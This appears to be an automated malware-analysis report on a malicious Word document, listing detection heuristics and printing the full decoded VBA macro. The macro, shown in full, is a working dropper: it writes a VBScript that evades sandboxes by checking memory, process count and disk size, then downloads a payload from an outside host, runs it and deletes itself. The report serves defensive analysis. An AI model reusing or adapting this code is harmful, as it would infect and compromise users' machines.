MALICIOUS
390
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
T1204.002 Malicious File
The sample is a malicious Office document containing obfuscated VBA macros. The Document_Close subroutine attempts to download and write a VBScript file named 'HelpCenter.vbs' to the user's Documents folder. This script is designed to check for specific computer names and potentially execute further actions, indicating a downloader or dropper functionality.
Heuristics 10
-
VBA project inside OOXML medium 8 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
hwiqfhssaqE.Write "Set objShell = WScript.CreateObject(""WScript.Shell"")" & vbCrLf -
LOLBin reference in VBA critical OLE_VBA_LOLBINLOLBin reference in VBAMatched line in script
Result = "wscript.exe " & Chr(34) & qs & Chr(34) -
Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URLVBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.Matched line in script
hwiqfhssaqE.Write "Set objShell = WScript.CreateObject(""WScript.Shell"")" & vbCrLf -
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXECVBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.Matched line in script
hwiqfhssaqE.Write ".write xHttp.responseBody" & vbCrLf -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set nbhx28yw = CreateObject("Scripting.FileSystemObject") -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
hwiqfhssaqE.Write "Set objWMIService = GetObject(""winmgmts:\\"" & strComputer & ""\root\cimv2"")" & vbCrLf -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
hwiqfqqE = Environ("USERPROFILE") + "\Documents" -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas Referenced by macro
- http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
- http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
- http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro
- https://crabbier-airports.000webhostapp.com/index66.htmlReferenced by macro
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 4810 bytes |
SHA-256: 2de5fb4e7598c3cc5b69717959ab4305d4744d0adc7efc643dc07d34ee4f16b0 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Rem Attribute VBA_ModuleType=VBADocumentModule
Private Sub Document_Close()
On Error Resume Next
Dim wipsirdx
Dim nbhx28yw
Dim hwiqfqqE
Set nbhx28yw = CreateObject("Scripting.FileSystemObject")
hwiqfqqE = Environ("USERPROFILE") + "\Documents"
If Not nbhx28yw.FileExists(Environ("USERPROFILE") + "\Documents\" + "tLLsm4W2.txt") Then
If Not nbhx28yw.FolderExists(hwiqfqqE) Then nbhx28yw.CreateFolder (hwiqfqqE)
qs = hwiqfqqE + "\HelpCenter.vbs"
Dim hwiqfhssaqE As Object
Set hwiqfhssaqE = nbhx28yw.CreateTextFile(qs, True, True)
hwiqfhssaqE.Write "strComputer = "".""" & vbCrLf
hwiqfhssaqE.Write "Set objWMIService = GetObject(""winmgmts:\\"" & strComputer & ""\root\cimv2"")" & vbCrLf
hwiqfhssaqE.Write "Set colItems = objWMIService.ExecQuery(""Select * from Win32_OperatingSystem"", , 48)" & vbCrLf
hwiqfhssaqE.Write "For Each objItem In colItems" & vbCrLf
hwiqfhssaqE.Write "named = objItem.CSName" & vbCrLf
hwiqfhssaqE.Write "numbproc = objItem.NumberOfProcesses" & vbCrLf
hwiqfhssaqE.Write "memory = objItem.TotalVisibleMemorySize" & vbCrLf
hwiqfhssaqE.Write "sArray = Array(""DESKTOP-DN3JK31"", ""DESKTOP-D"", ""DESKTOP-D2231"")" & vbCrLf
hwiqfhssaqE.Write "sFind = named" & vbCrLf
hwiqfhssaqE.Write "s = Join(sArray, ""|"")" & vbCrLf
hwiqfhssaqE.Write "If InStr(1, s, sFind, vbTextCompare) Then" & vbCrLf
'hwiqfhssaqE.Write "MsgBox ""yep""" & vbCrLf
hwiqfhssaqE.Write "Else" & vbCrLf
hwiqfhssaqE.Write "End If" & vbCrLf
hwiqfhssaqE.Write "Next" & vbCrLf
hwiqfhssaqE.Write "If memory < 4000000 Then" & vbCrLf
hwiqfhssaqE.Write "Set mFSO = CreateObject(""Scripting.FileSystemObject"")" & vbCrLf
hwiqfhssaqE.Write "Call mFSO.DeleteFile(Wscript.ScriptFullName, True)" & vbCrLf
hwiqfhssaqE.Write "Wscript.Quit" & vbCrLf
hwiqfhssaqE.Write "Else" & vbCrLf
'hwiqfhssaqE.Write "MsgBox "">4gb""" & vbCrLf
hwiqfhssaqE.Write "End If" & vbCrLf
hwiqfhssaqE.Write "If numbproc < 28 Then" & vbCrLf
hwiqfhssaqE.Write "Set mFSO = CreateObject(""Scripting.FileSystemObject"")" & vbCrLf
hwiqfhssaqE.Write "Call mFSO.DeleteFile(Wscript.ScriptFullName, True)" & vbCrLf
hwiqfhssaqE.Write "Wscript.Quit" & vbCrLf
hwiqfhssaqE.Write "Else" & vbCrLf
'hwiqfhssaqE.Write "MsgBox "">28""" & vbCrLf
hwiqfhssaqE.Write "End If" & vbCrLf
hwiqfhssaqE.Write "strComputer = "".""" & vbCrLf
hwiqfhssaqE.Write "Set objWMIService = GetObject(""winmgmts:\\"" & strComputer & ""\root\cimv2"")" & vbCrLf
hwiqfhssaqE.Write "Set colItems = objWMIService.ExecQuery(""Select * from Win32_DiskDrive"", , 48)" & vbCrLf
hwiqfhssaqE.Write "For Each objItem In colItems" & vbCrLf
hwiqfhssaqE.Write "disksize = objItem.Size" & vbCrLf
hwiqfhssaqE.Write "If disksize < 60000000000 Then" & vbCrLf
hwiqfhssaqE.Write "Set mFSO = CreateObject(""Scripting.FileSystemObject"")" & vbCrLf
hwiqfhssaqE.Write "Call mFSO.DeleteFile(Wscript.ScriptFullName, True)" & vbCrLf
hwiqfhssaqE.Write "Wscript.Quit" & vbCrLf
hwiqfhssaqE.Write "Else" & vbCrLf
'hwiqfhssaqE.Write "MsgBox "">60gb""" & vbCrLf
hwiqfhssaqE.Write "End If" & vbCrLf
hwiqfhssaqE.Write "Next" & vbCrLf
'hwiqfhssaqE.Write "End Sub" & vbCrLf
hwiqfhssaqE.Write "Dim xHttp: Set xHttp = CreateObject(""microsoft.xmlhttp"")" & vbCrLf
hwiqfhssaqE.Write "Dim bStrm: Set bStrm = CreateObject(""Adodb.Stream"")" & vbCrLf
hwiqfhssaqE.Write "xHttp.Open ""GET"", ""https://crabbier-airports.000webhostapp.com/index66.html"", False" & vbCrLf
hwiqfhssaqE.Write "xHttp.Send" & vbCrLf
hwiqfhssaqE.Write "With bStrm" & vbCrLf
hwiqfhssaqE.Write ".Type = 1" & vbCrLf
hwiqfhssaqE.Write ".Open" & vbCrLf
hwiqfhssaqE.Write ".write xHttp.responseBody" & vbCrLf
hwiqfhssaqE.Write ".savetofile ""putty.vbs"", 2 " & vbCrLf
hwiqfhssaqE.Write "End With" & vbCrLf
hwiqfhssaqE.Write "Set objShell = WScript.CreateObject(""WScript.Shell"")" & vbCrLf
hwiqfhssaqE.Write "objShell.Run (""putty.vbs"")" & vbCrLf
hwiqfhssaqE.Write "Set mFSO = CreateObject(""Scripting.FileSystemObject"")" & vbCrLf
hwiqfhssaqE.Write "Call mFSO.DeleteFile(Wscript.ScriptFullName, True)" & vbCrLf
hwiqfhssaqE.Write "Wscript.Quit" & vbCrLf
hwiqfhssaqE.Close
Set wipsirdx = CreateObject("WScript.Shell")
Result = "wscript.exe " & Chr(34) & qs & Chr(34)
wipsirdx.Run Result, 1, True
Set mFSO = CreateObject("Scripting.FileSystemObject")
Call mFSO.DeleteFile(Wscript.ScriptFullName, True)
Wscript.Quit
End If
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 14848 bytes |
SHA-256: ca994a44001bd28a5f1efa9b3fe2633098980c67af079d79d7817cbf8e0be322 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.